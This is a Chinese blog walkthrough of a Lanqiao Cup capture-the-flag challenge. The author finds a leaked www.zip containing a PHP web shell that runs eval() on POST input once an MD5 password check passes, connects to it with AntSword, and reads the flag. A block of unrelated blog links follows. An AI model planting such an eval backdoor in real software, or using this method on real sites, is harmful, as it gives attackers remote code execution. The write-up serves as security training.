蓝桥杯-网络安全比赛题目-遗漏的压缩包

复制代码
小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击"下发赛题"后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
php 复制代码
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于'217f81b8ff0a1ab138a8e1bdc031262e'

输入密码,通过蚁剑进入SHELL

连接成功

进入根目录,找到flag

成功夺旗!

相关推荐
xlq223222 分钟前
56.自定义协议
linux·服务器·网络·网络协议
月落归舟1 小时前
深入理解Cookie与Session:解决HTTP无状态的核心方案
网络·网络协议·http
戴西软件1 小时前
戴西软件入选2026年安徽省制造业数智化转型服务商名单
java·大数据·服务器·前端·人工智能
探索者011 小时前
SQL注入介绍
web安全·sql注入
薛定猫AI2 小时前
【深度解析】从 Antigravity 更新看 Agent IDE 的工程化演进:权限、沙盒、MCP 与模型治理
前端·javascript·ide
漂流瓶jz8 小时前
总结CSS组件化演进之路:命名规范/CSS Modules/CSS in JS/原子化CSS
前端·javascript·css
踩着两条虫9 小时前
「AI + 低代码」的可视化设计器
开发语言·前端·低代码·设计模式·架构
Jagger_9 小时前
项目上线忙碌结束之后,为什么总想找点事做?
前端
2601_957787589 小时前
企业级内容矩阵的安全合规体系构建与技术实现
大数据·安全·矩阵
GalenZhang8889 小时前
OpenClaw 配置多个飞书账号实战指南
前端·chrome·飞书·openclaw